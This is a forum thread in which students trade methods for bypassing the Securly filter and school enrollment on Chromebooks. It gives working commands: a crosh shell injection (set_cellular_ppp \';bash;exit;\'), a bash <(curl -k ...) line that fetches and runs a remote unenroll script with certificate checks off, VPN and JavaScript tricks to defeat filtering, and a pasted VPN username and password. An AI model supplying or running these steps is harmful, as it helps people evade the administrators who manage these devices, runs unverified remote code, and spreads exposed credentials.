Securly for Chromebook bypass?

Search This thread

NotPeak

Nov 15, 2022
TCL 10L
On chrome100.dev, my board is Octopus. When I go to the page with Recovery Images, there are 2 images that are ChromeOS 91, one is 91.0.4472.167 for platform 13904.97.0, and the other is 91.0.4472.102 for platform 13904.55.0. Does it matter which one I download? The device I have is a Chromebook 3100. It also looks like my school blocked Crosh. Is the block setting only stored on the device (with district enrollment), or is it in my account's settings?
First, I don't think it matters which v91 but I always go with the first one just to play it safe. Second, if Chrosh is blocked, try using v87, iirc the crosh url is different, otherwise make a reply here and I can try helping you sort out the crosh part.

the LucidLibrary

Sep 16, 2019
Hey NotPeak, I have a question. It's about Discord's verification system. My school account doesn't receive emails from outside my school district, so how can I get around that? Also, I can use this with an unblocker and get discord at my school. Thanks in advance!

NotPeak

Nov 15, 2022
TCL 10L
Hey NotPeak, I have a question. It's about Discord's verification system. My school account doesn't receive emails from outside my school district, so how can I get around that? Also, I can use this with an unblocker and get discord at my school. Thanks in advance!
I don't know of a bypass for the email portion, although with the unenroll exploit you can log into your personal gmail account. I prob should have mentioned to do that in the guide

NotPeak

Nov 15, 2022
TCL 10L
I don't know of a bypass for the email portion, although with the unenroll exploit you can log into your personal gmail account. I prob should have mentioned to do that in the guide
Also extra note, you can use a VPN like proton or any other free ones (Proton is pretty easy to setup, just lookup how to set it up with a .onc file) to bypass a wifi block.

the LucidLibrary

Sep 16, 2019
Also extra note, you can use a VPN like proton or any other free ones (Proton is pretty easy to setup, just lookup how to set it up with a .onc file) to bypass a wifi block.
But Proton VPN is only for PC, isn't it? And plus, if there was an extension version for it, it would be blocked by my school's administrator.

NotPeak

Nov 15, 2022
TCL 10L
1 - Create or log into a proton vpn account https://account.protonvpn.com/signup 2 - Once you have an account go to - account > OpenVPN / IKEv2 username 3 - Copy the username and password 4 - Unzip the files and choose one that you want to use (like us-19 or s/t) 5 - Edit it in the Text editor app (it's a built-in chrome app on Chromebook) or somewhere 6 - All the way at the end, after "TLSAuthContents": "-----BEGIN OpenVPN Static key V1----- put in ,
"Username": "Username_here",
"Password": "Password_here"
You can just copy and paste it and you'll get the right formatting Make sure that you start the paste right after the end quotation mark 7 - Save the onc file 8 - Upload it to chrome://network#general all the way at the bottom where it says Import ONC File (don't worry if you don't notice anything, just try scrolling down a little more and it should say Networks imported: 1 (regardless of how many you actualy imported)) Enjoy!!

Attachments

• proton_onc_files.zip
    265.5 KB · Views: 56

NotPeak

Nov 15, 2022
TCL 10L
1 - Create or log into a proton vpn account https://account.protonvpn.com/signup 2 - Once you have an account go to - account > OpenVPN / IKEv2 username 3 - Copy the username and password 4 - Unzip the files and choose one that you want to use (like us-19 or s/t) 5 - Edit it in the Text editor app (it's a built-in chrome app on Chromebook) or somewhere 6 - All the way at the end, after "TLSAuthContents": "-----BEGIN OpenVPN Static key V1----- put in ,
You can just copy and paste it and you'll get the right formatting Make sure that you start the paste right after the end quotation mark 7 - Save the onc file 8 - Upload it to chrome://network#general all the way at the bottom where it says Import ONC File (don't worry if you don't notice anything, just try scrolling down a little more and it should say Networks imported: 1 (regardless of how many you actualy imported)) Enjoy!!
Just copy pasted that from a guide, should work for you, also there is a new version of LTBeef that apparently works on 106+, haven't tested it yet, if you want either message me on Remind or Discord and I can send it over

the LucidLibrary

Sep 16, 2019
Hey NotPeak, I cant seem to find a way to edit the file seen as there is no way to open it on my Chromebook with a text editor or anything because there is none besides like Google Docs.
Could you edit it for me please?
Here is my Username and Password:

"Username": "bjcVPfEHZILUyZ5o",
"Password": "qQtr2hgPAXwu7isUfAxt0LyVdll2mjGI"

Thanks in advance!

I edited the file on my PC, uploaded it back to my Chromebook, and then tried to put it into that link you gave me, but it gave me this:
Errors occurred during ONC parsing.
Networks imported: 0
How to fix?

GeTuck

Sep 21, 2021
First, I don't think it matters which v91 but I always go with the first one just to play it safe. Second, if Chrosh is blocked, try using v87, iirc the crosh url is different, otherwise make a reply here and I can try helping you sort out the crosh part.
I succesfully downgraded to version 87, and was able to open CROSH, but when I tryped in the curl command for downloading the script, it said it couldn't trust the server because of a bad SSL connection or something.
Screenshot 2022-12-22 at 9.22.03 AM.png

Last edited:

NotPeak

Nov 15, 2022
TCL 10L
I succesfully downgraded to version 87, and was able to open CROSH, but when I tryped in the curl command for downloading the script, it said it couldn't trust the server because of a bad SSL connection or something.
View attachment 5791079
Is it because I'm on my school wifi and it blocks me from downloading it or something?
It could be due to school wifi, try doing it at home. Also, what board do you have?

GeTuck

Sep 21, 2021
It could be due to school wifi, try doing it at home. Also, what board do you have?
I don't think it is, I just figured out that I can type curl -k https://coolelectronics.me/unroll to download the script, so I know that the school doesn't block that, but how do I execute the script? It displayed the commands in the script, should I copy and paste that? My board is Octopus, I don't think that matters though.
Screenshot 2022-12-22 at 9.33.50 AM.png

GeTuck

Sep 21, 2021
I think that I would have to put -k's in the bash's curl commands to disable the SSL verification too, I'll try figuring that out.

GeTuck

Sep 21, 2021
Also, make sure that you are on the right version and the cb didn't auto update
I made sure that it was still at 87 and it did not update,
I tried typing set_cellular_ppp \';bash;exit;\', then I did bash <(curl -k https://coolelectronics.me/unroll87), and the script executed successfully! When the script finished and it rebooted, however, it rebooted again and it showed me this screen: (URL since XDA is undergoing maintenance Click for image). I was able to recover the device by pressing esc + reload + power, and inserting the Chrome 87/recovery USB. What could be causing this?

NotPeak

Nov 15, 2022
TCL 10L
I made sure that it was still at 87 and it did not update,
I tried typing set_cellular_ppp \';bash;exit;\', then I did bash <(curl -k https://coolelectronics.me/unroll87), and the script executed successfully! When the script finished and it rebooted, however, it rebooted again and it showed me this screen: (URL since XDA is undergoing maintenance Click for image). I was able to recover the device by pressing esc + reload + power, and inserting the Chrome 87/recovery USB. What could be causing this?
You said yes to being a sys admin, that's the only reason that would happen

Top Liked Posts

• There are no posts matching your filters.
    What do you mean? This forum has been very active?

Any bypass for something called Deledao? It blocks everything and I can’t access sources for work.
    When you say active, you mean active like only a month ago, but otherwise, nothing really new has popped up. I do know somebody that has a LOT more experience with this kind of stuff at my school, but I don't know if they want to join the forum or not.
    If only we had a way to re-enable bookmarklets...
    Wouldn't be online though, making it pretty much ineffective for online sites that require wifi
    At my school, we have Chromebooks and a service/extension called securly. Me and my buddies have been trying to bypass it since it was first introduced last year. We are cool with the tech teacher and we have been trying to get passed him for a long time.

Any help on bypassing securly?

Note, inspect element has been blocked along with all extensions except for some adblockers. You can also only sign in on our district accounts. I do not want to powerwash it nor uninroll it(if that's how you spell it haha)

Any help would be greatly appreciated, thanks
    Gavin
    Does anyone want to talk about how a staff member came and talked in this forum?

Yeah, that's kinda weird. This is our forum, not theirs. Not saying they comment here (mainly because they can and because I don't want to get banned), but they should stay out of this forum for as much as possible, because we don't need interference from someone (the mod) who isn't even here to discuss about the main topic , so, yeah.

A note for you both and others, remember you asked to join this Site, we did not invite you, so the Forums belong to all Members, and actually, they belong to Valnet. The Moderators and Staff are volunteers for Velnet and like you, we are Members, but we are here to assist in the Forum Rules, that you and all agreed upon. You can see at the top of the Forum Rules a listing of the (Volunteering) Moderators. So there is nothing weird about us being in this section or any on XDA, we address items/issues that are reported on, the XDA forums.
    Thank you and have a great day.

XDA Developers is a Valnet Property
    100 - 7405 Transcanadienne
    St.Laurent, Quebec, H4T 1Z2
    Toll-Free Phone Number: 1-833-979-3525
    www.valnetinc.com
    all you have to do is open a console (default chrome: ctrl+shift+j) and put this code in: var a=true;while(a){alert(a);}
    then hit enter. when the msg box appears, click the check box that says "prevent this page from showing additional diologs" (or something like that)
    your filter should be disabled until you restart.

DISCLAIMER: I AM IN NO WAY RESPONSIBLE IF YOU GET IN TROUBLE FOR THIS. THIS IS PURELY FOR EDUCATIONAL PURPOSES. I DO NOT CONDONE ANY ILLEGAL ACTIVITY OR ANY ACTIVITY AGAINST SCHOOL RULES.
    By the way, just for the future of this forum, should we celebrate it when it reaches 50 pages long, or 100? Or both separately as milestones? Anyone's thoughts?
    The Schools are Using this system for: 1. To Keep Kids on Focus at all times and not playing games or pirating videos. By Using this system they can also block specific sites and forbid specific downloads
    , though on a computer or desktop you can just use Microsoft Store and Bypass all of that
    . This strives to ensure that Students remain on task at all times and not playing around on the computer or desktop, laptop, Chromebook, and Cell Phones. This also helps insure that none can use their phones to take unwanted videos or pictures and post them on Social Media (Facebook, Twitter, Snapchat, YouTube, Linked In, etc.). So maybe you should use this opportunity to broaden your horizons while you still have the chance.

lol get outa here school supporter

---------- Post added at 02:22 AM ---------- Previous post was at 02:19 AM ----------

My dudes, go to securly in the shelf double tap, click on manage extensions, in the top right hand corner it says developer mode click it then scroll down to the ID if its blue Its a link (if not then you're screwed) then you will be in the OS console then simply type in this:

window.close()

exactly like that k?
    if its still blocking stuff then just set up a hotspot (phone wifi) then go to school and BAM, no securly

welcome,
    me

---------- Post added at 12:08 AM ---------- Previous post was at 12:01 AM ----------

HAHA lol we are cool they cant see it in your search history plus while i was on it some dude was looking at some anime "stuff"

(school chromebook cant say *deep, sarcastic breath* certain things lets just say its a "chicken wearing a tie"
    (metaphore) but I fond an exploit down above if you can see it then you are welcome.

The first part would work, but usually dev mode is disabled :/
    Also a hotspot wouldn't help because securely checks the url in your address bar, not your web traffic. If it were something like sonicwall that would work, but not securely

lol sorry to poke holes in your help, just trying to make it easier for others